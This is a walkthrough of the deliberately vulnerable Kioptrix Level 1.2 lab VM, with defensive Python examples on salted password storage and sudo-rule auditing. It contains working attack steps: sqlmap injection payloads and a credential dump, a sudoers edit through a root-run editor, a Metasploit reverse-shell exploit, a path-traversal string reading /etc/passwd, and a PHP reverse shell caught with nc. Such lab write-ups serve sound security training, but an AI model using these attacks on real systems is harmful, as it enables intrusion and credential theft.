VulnHub target walkthrough [KVM3]

Name: Kioptrix: Level 1.2 (#3)
Release date: 18 April 2011

Download:

  • Download: http://www.kioptrix.com/dlvm/KVM3.rar
  • Download (Mirror): https://download.vulnhub.com/kioptrix/KVM3.rar
  • Download (Torrent): https://download.vulnhub.com/kioptrix/KVM3.rar.torrent

Description:

It's been a while since the last Kioptrix VM challenge. Life keeps getting in the way of these things, you know.
After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt it was time for 1.2 (or just Level 3). Thanks to everyone who downloaded and played the first two versions. Also thanks to those who took the time to make video solutions for them. Much appreciated.
As with the other two, this challenge is geared towards the beginner. It is, however, different. A few more steps were added and a new skill set is required. Still within the realm of the beginner, I must add. As with the others, there is more than one way to "pwn" this one. There is easy and not so easy. Remember... the sense of "easy" or "difficult" is always relative to one's own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks...
Important thing with this challenge: once you find the IP (DHCP client), edit your hosts file and point it to kioptrix3.com.
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com

Under Linux that would be /etc/hosts.
There is a web application involved, so to have everything displayed nicely and properly you really need to do this.
Hope you enjoy the Kioptrix VM Level 1.2 challenge.
Have fun

Vulnerabilities:

  • File inclusion
  • Improper access control
  • Credential reuse
  • SQL injection
  • Unrestricted upload of files with a dangerous type
  • Weak credentials

Information gathering

Start with nmap. A ping sweep finds the target, then a full service and vuln-script scan against it:

root@kali:~# nmap -sn -v 192.168.84.0/24
Nmap scan report for 192.168.84.144
Host is up (0.00023s latency).
MAC Address: 00:0C:29:44:36:85 (VMware)
root@kali:~# nmap -A -v -sV -Pn -T4 --script=vuln 192.168.84.144
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:4.7p1:
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
|_ CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.84.144
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.84.144:80/gallery/
| Form id:
| Form action: login.php
|
| Path: http://192.168.84.144:80/index.php?system=Admin
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.84.144:80/gallery/index.php
| Form id:
| Form action: login.php
|
| Path: http://192.168.84.144:80/gallery/gadmin/
| Form id: username
| Form action: index.php?task=signin
|
| Path: http://192.168.84.144:80/index.php?system=Admin&page=loginSubmit
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.84.144:80/index.php?system=Blog&post=1281005380
| Form id: commentform
|_ Form action:
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /cache/: Potentially interesting folder
| /core/: Potentially interesting folder
| /icons/: Potentially interesting folder w/ directory listing
| /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /style/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
|_ http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.2.8:
| CVE-2010-0425 10.0 https://vulners.com/cve/CVE-2010-0425
| CVE-2011-3192 7.8 https://vulners.com/cve/CVE-2011-3192
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
| CVE-2009-1891 7.1 https://vulners.com/cve/CVE-2009-1891
| CVE-2009-1890 7.1 https://vulners.com/cve/CVE-2009-1890
| CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2011-3368 5.0 https://vulners.com/cve/CVE-2011-3368
| CVE-2010-1452 5.0 https://vulners.com/cve/CVE-2010-1452
| CVE-2010-0408 5.0 https://vulners.com/cve/CVE-2010-0408
| CVE-2009-2699 5.0 https://vulners.com/cve/CVE-2009-2699
| CVE-2008-2364 5.0 https://vulners.com/cve/CVE-2008-2364
| CVE-2007-6750 5.0 https://vulners.com/cve/CVE-2007-6750
| CVE-2009-1195 4.9 https://vulners.com/cve/CVE-2009-1195
| CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031
| CVE-2011-3607 4.4 https://vulners.com/cve/CVE-2011-3607
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053
| CVE-2011-4317 4.3 https://vulners.com/cve/CVE-2011-4317
| CVE-2011-3639 4.3 https://vulners.com/cve/CVE-2011-3639
| CVE-2011-3348 4.3 https://vulners.com/cve/CVE-2011-3348
| CVE-2011-0419 4.3 https://vulners.com/cve/CVE-2011-0419
| CVE-2010-0434 4.3 https://vulners.com/cve/CVE-2010-0434
| CVE-2008-2939 4.3 https://vulners.com/cve/CVE-2008-2939
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
| CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
|_ CVE-2011-4415 1.2 https://vulners.com/cve/CVE-2011-4415

The scan reports SQL injection candidates and exposes /phpmyadmin/, so sqlmap is the obvious next step. Note that nmap's http-sql-injection hits on index.php?page= are heuristic ("Possible sqli"); the request that actually turns out to be injectable is the gallery's photo view. Click the spot shown in the screenshot below, capture the request with Burp, save it as sqlmap.txt and hand it to sqlmap with -r. sqlmap confirms the id parameter (boolean-based, error-based, time-based and a 6-column UNION) and the sort parameter (time-based); the `sort=photoid` in every payload is what identifies the request. The HTTP 500 warning is just the application choking on malformed input and does not interfere with extraction.

root@kali:~# sqlmap -r sqlmap.txt 
___
__H__
___ ___[)]_____ ___ ___ {1.3.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:14:33 /2019-12-13/

[04:14:33] [INFO] parsing HTTP request from 'sqlmap.txt'
[04:14:33] [INFO] resuming back-end DBMS 'mysql'
[04:14:33] [INFO] testing connection to the target URL
[04:14:33] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE (SELECT 1341 UNION SELECT 9380) END))&sort=photoid

Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(1324,2762)>(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1324=1324,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM (SELECT 8520 UNION SELECT 1582 UNION SELECT 8916 UNION SELECT 1258)a GROUP BY x)&sort=photoid

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 4741 FROM (SELECT(SLEEP(5)))vtbf)&sort=photoid

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x7171766a71,0x4d67454a425a6e796b5745656b794f584a4348714c79624d4255416243444967494975507875524d,0x7170786a71),NULL,NULL,NULL,NULL,NULL-- TpfQ&sort=photoid

Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1&sort=photoid AND (SELECT 4185 FROM (SELECT(SLEEP(5)))Gmzf)
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: id, type: Unescaped numeric (default)
[1] place: GET, parameter: sort, type: Unescaped numeric
[q] Quit
[04:14:34] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:14:34] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[04:14:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] ending @ 04:14:34 /2019-12-13/
root@kali:~# sqlmap -r sqlmap.txt -D gallery -T dev_accounts --dump
___
__H__
___ ___[)]_____ ___ ___ {1.3.12#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:18:17 /2019-12-13/

[04:18:17] [INFO] parsing HTTP request from 'sqlmap.txt'
[04:18:17] [INFO] resuming back-end DBMS 'mysql'
[04:18:17] [INFO] testing connection to the target URL
[04:18:18] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE (SELECT 1341 UNION SELECT 9380) END))&sort=photoid

Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(1324,2762)>(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1324=1324,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM (SELECT 8520 UNION SELECT 1582 UNION SELECT 8916 UNION SELECT 1258)a GROUP BY x)&sort=photoid

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 4741 FROM (SELECT(SLEEP(5)))vtbf)&sort=photoid

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x7171766a71,0x4d67454a425a6e796b5745656b794f584a4348714c79624d4255416243444967494975507875524d,0x7170786a71),NULL,NULL,NULL,NULL,NULL-- TpfQ&sort=photoid

Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1&sort=photoid AND (SELECT 4185 FROM (SELECT(SLEEP(5)))Gmzf)
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: id, type: Unescaped numeric (default)
[1] place: GET, parameter: sort, type: Unescaped numeric
[q] Quit
[04:18:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:18:18] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[04:18:18] [INFO] used SQL query returns 3 entries
[04:18:19] [INFO] used SQL query returns 3 entries
[04:18:19] [INFO] retrieved: 'id'
[04:18:19] [INFO] retrieved: 'int(10)'
[04:18:19] [INFO] retrieved: 'username'
[04:18:19] [INFO] retrieved: 'varchar(50)'
[04:18:19] [INFO] retrieved: 'password'
[04:18:19] [INFO] retrieved: 'varchar(50)'
[04:18:19] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[04:18:19] [INFO] used SQL query returns 2 entries
[04:18:19] [INFO] retrieved: '1','0d3eccfb887aabd50f243b3f155c0f85','dreg'
[04:18:19] [WARNING] automatically patching output having last char trimmed
[04:18:19] [INFO] retrieved: '2','5badcaf789d3d1d09794d8f021f40f0e','loneferret'
[04:18:19] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[04:18:22] [INFO] writing hashes to a temporary file '/tmp/sqlmapa2cskfzq12456/sqlmaphashes-0oyz7rlz.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[04:18:28] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:18:31] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[04:18:34] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:18:34] [INFO] starting 4 processes
[04:18:39] [INFO] cracked password 'starwars' for user 'loneferret'
[04:18:40] [INFO] cracked password 'Mast3r' for user 'dreg'
Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password | username |
+----+---------------------------------------------+------------+
| 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg |
| 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

[04:18:42] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[04:18:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[04:18:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] ending @ 04:18:42 /2019-12-13/

sqlmap dumps the accounts and, because the passwords are stored as plain unsalted MD5, cracks both against its default wordlist in a few seconds, so there is no separate hash-cracking step. The gallery's "dev accounts" are also system accounts: the same two passwords work over SSH (credential reuse), which is the foothold used next.
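Why sqlmap could hand back both plaintexts so quickly deserves a closer look. The Python below is an added example, not part of the original write-up and not sqlmap's code: it replays the dictionary attack against the two digests dumped above using a small constructed word list and suffix list (sqlmap's real wordlist.tx_ is far larger), then shows what the gallery should have stored instead, a per-user salted PBKDF2 record. The point is the cost model: with unsalted MD5, every candidate hash is checked against every dumped user at once, and the work is the same whether two or two million rows were dumped.

```python
"""Unsalted MD5 versus a salted, slow hash, using the digests dumped from
gallery.dev_accounts.  Added example; word list and suffixes are constructed."""
import hashlib
import hmac
import os

# The two rows sqlmap dumped from gallery.dev_accounts: bare MD5, no salt.
DUMPED_HASHES = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed stand-in for sqlmap's default dictionary (wordlist.tx_).
WORDLIST = ["password", "123456", "master", "starwars", "letmein", "Mast3r", "kioptrix"]

# Constructed stand-in for what sqlmap's "common password suffixes" option tries.
SUFFIXES = ["", "1", "12", "123", "!", "2011"]


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def crack_unsalted_md5(hashes, wordlist, suffixes):
    """Dictionary attack on unsalted digests.

    With no salt, one digest per candidate is looked up against *all* users:
    the cost is len(wordlist) * len(suffixes) hashes regardless of how many
    accounts were dumped.  Returns (cracked_map, number_of_hashes_computed).
    """
    wanted = {digest: user for user, digest in hashes.items()}
    cracked, attempts = {}, 0
    for word in wordlist:
        for suffix in suffixes:
            attempts += 1
            user = wanted.get(md5_hex(word + suffix))
            if user is not None:
                cracked[user] = word + suffix
    return cracked, attempts


# --- what the gallery should have stored ---------------------------------

ITERATIONS = 200_000  # kept modest for the demo; tune to ~100 ms on real hardware


def store_password(password: str) -> str:
    """16 random salt bytes + PBKDF2-HMAC-SHA256, encoded as one record."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def records_collide(password: str) -> bool:
    """Two users with the same password: with a per-user salt the stored
    records differ, so cracking one row says nothing about the other."""
    return store_password(password) == store_password(password)


if __name__ == "__main__":
    found, n = crack_unsalted_md5(DUMPED_HASHES, WORDLIST, SUFFIXES)
    print(f"{n} MD5 computations recovered {len(found)}/{len(DUMPED_HASHES)} passwords: {found}")
    record = store_password("starwars")
    print("salted record:", record)
    print("verify correct:", verify_password("starwars", record),
          " verify wrong:", verify_password("Starwars", record),
          " identical records for same password:", records_collide("starwars"))
```

Against the salted scheme the same word list has to be hashed once per user with that user's salt, and the iteration count sets the price of every guess, which is why no tool "cracks them in passing" any more.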

Privilege escalation

SSH in with the recovered credentials:

root@kali:~# ssh loneferret@192.168.84.144
loneferret@192.168.84.144's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$ pwd
/home/loneferret
loneferret@Kioptrix3:~$ whoami
loneferret
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht

The `sudo -l` output shows that loneferret can run the HT editor, /usr/local/bin/ht, as root without a password (the `!/usr/bin/su` entry merely blacklists su). An editor running as root can write any file on the system, so the first idea is to edit /etc/sudoers and grant ourselves a shell. If `sudo ht` fails with a terminal error, export a TERM value that ht understands, as below.

loneferret@Kioptrix3:~$ sudo ht /etc/sudoers 
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm-color
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

The sudoers file now opens in ht.

From here press F3, type /etc/sudoers and press Enter. On the loneferret line, at the position shown in the screenshot below, append `, /bin/sh`, then press F10, answer Yes to save, and exit.

Now one command takes the ordinary user to root:

loneferret@Kioptrix3:~$ sudo /bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# pwd
/home/loneferret
# cd /root
# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

That completes the challenge.
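The rule that sank this box is worth auditing generically. The script below is an added example (not from the write-up and not part of sudo) that parses the `sudo -l` output shown above, with one constructed benign rule (/sbin/reboot) added for contrast, and flags entries an attacker can turn into root: any rule on an editor, pager or interpreter, especially with NOPASSWD, and `!` negations, which the sudoers(5) manual itself says are not an effective way to subtract commands. The set of escape-capable binaries is a short constructed subset, not a complete catalogue.

```python
"""Audit `sudo -l` output for rules that hand out a root shell.
Added example; the input is the capture from this box plus one constructed rule."""
import re

SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) NOPASSWD: /sbin/reboot
"""

# Binaries that, run as root, give back a shell or an arbitrary file write.
# Editors belong here: `sudo ht /etc/sudoers` is exactly how this box fell.
# Constructed subset for the demo, not an exhaustive list.
SHELL_ESCAPES = {
    "ht", "vi", "vim", "nano", "emacs", "less", "more", "man", "find",
    "awk", "perl", "python", "ruby", "sh", "bash", "dash", "env", "su",
}

# (runas) TAG: TAG: command[, command...]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*?)\s*$"
)


def parse_sudo_l(text):
    """Turn `sudo -l` rule lines into dicts; the header line is skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(re.findall(r"([A-Z_]+):", m.group("tags")))
        for cmd in re.split(r",\s*", m.group("cmds")):
            negated = cmd.startswith("!")
            cmd = cmd.lstrip("!")
            prog = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the binary
            rules.append({"runas": m.group("runas"), "tags": tags,
                          "cmd": cmd, "prog": prog, "negated": negated})
    return rules


def audit_sudo_rules(rules):
    """Return (command, reason) for every rule that yields root to the caller."""
    findings = []
    for r in rules:
        if r["negated"]:
            findings.append((r["cmd"],
                "'!' only subtracts from an allow-list; sudoers(5) documents that this "
                "is not an effective control, and the ht rule on this host makes it moot"))
        elif r["prog"] == "ALL" or r["prog"] in SHELL_ESCAPES:
            how = "without a password" if "NOPASSWD" in r["tags"] else "after authenticating"
            findings.append((r["cmd"],
                f"runs as {r['runas']} {how} and can open a shell or edit any file"))
    return findings


if __name__ == "__main__":
    for cmd, reason in audit_sudo_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"[!] {cmd}: {reason}")
```

The fix is not a longer deny-list. Drop the ht rule altogether, or, if a root-owned file really must be editable by this user, grant sudoedit on that one file so the editor itself never runs as root.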

Other routes

  • Exploit the LotusCMS 3.0 eval() remote command execution vulnerability

The Metasploit module exploit/multi/http/lcms_php_exec gives a shell directly:

root@kali:~# msfdb run
[+] Starting database

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v5.0.63-dev ]
+ -- --=[ 1951 exploits - 1091 auxiliary - 334 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.84.144
RHOSTS => 192.168.84.144
msf5 exploit(multi/http/lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.84.135
LHOST => 192.168.84.135
msf5 exploit(multi/http/lcms_php_exec) > set URI /
URI => /

msf5 exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.84.135:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 2 opened (192.168.84.135:4444 -> 192.168.84.144:57666) at 2019-12-14 06:18:03 -0500

whoami
www-data

Shell obtained, running as www-data. From here, enumerate the web root:

ls -la gallery/
total 164
drwxr-xr-x 7 root root 4096 Apr 14 2011 .
drwxr-xr-x 8 root root 4096 Apr 15 2011 ..
drwxr-xr-x 2 root root 4096 Apr 12 2011 BACK
-rw-r--r-- 1 root root 3573 Oct 10 2009 db.sql
-rw-r--r-- 1 root root 252 Apr 12 2011 g.php
drwxr-xr-x 3 root root 4096 Apr 12 2011 gadmin
-rw-r--r-- 1 root root 214 Apr 12 2011 gallery.php
-rw-r--r-- 1 root root 1440 Apr 14 2011 gconfig.php
-rw-r--r-- 1 root root 297 Apr 12 2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12 2011 gfunctions.php
-rw-r--r-- 1 root root 1009 Apr 12 2011 gheader.php
-rw-r--r-- 1 root root 249 Apr 12 2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12 2011 install.BAK
-rw-r--r-- 1 root root 212 Apr 12 2011 login.php
-rw-r--r-- 1 root root 213 Apr 12 2011 logout.php
-rw-r--r-- 1 root root 249 Apr 12 2011 p.php
drwxrwxrwx 2 root root 4096 Apr 12 2011 photos
-rw-r--r-- 1 root root 213 Apr 12 2011 photos.php
-rw-r--r-- 1 root root 219 Apr 12 2011 post_comment.php
-rw-r--r-- 1 root root 214 Apr 12 2011 profile.php
-rw-r--r-- 1 root root 87 Oct 10 2009 readme.html
-rw-r--r-- 1 root root 213 Apr 12 2011 recent.php
-rw-r--r-- 1 root root 215 Apr 12 2011 register.php
drwxr-xr-x 2 root root 4096 Apr 13 2011 scopbin
-rw-r--r-- 1 root root 213 Apr 12 2011 search.php
-rw-r--r-- 1 root root 216 Apr 12 2011 slideshow.php
-rw-r--r-- 1 root root 211 Apr 12 2011 tags.php
drwxr-xr-x 6 root root 4096 Apr 12 2011 themes
-rw-r--r-- 1 root root 56 Oct 10 2009 version.txt
-rw-r--r-- 1 root root 211 Apr 12 2011 vote.php

In the gallery directory, the Gallarific configuration file gconfig.php contains the MySQL credentials the web application connects with; they are the same credentials phpMyAdmin accepts.

cat gallery/gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}

}
}

?>

The application connects to MySQL as root with the password fuckeyou, and the file is world-readable inside the web root, so anyone with a www-data shell gets the database superuser for free. Log into phpMyAdmin with root / fuckeyou and get a shell from there.

For details, see: phpmyadmin getshell

  • Chaining the LFI vulnerability
http://192.168.84.144/index.php?system=../../../../../../../etc/passwd%00.html

Log into the gallery admin panel with the admin password recovered through the SQL injection above, as shown in the screenshot.

Rename a PHP reverse shell to a .jpg extension and upload it through the gallery, then right-click the image to copy its link. The extension only matters to the upload filter: when the LFI include()s the file, PHP executes whatever it contains.

Request it through the LFI in the browser:

192.168.84.144/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/x281lo68jw.jpg%00.html

The nc listener on Kali receives the shell at the same time:

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
connect to [192.168.84.135] from kioptrix3.com [192.168.84.144] 37790
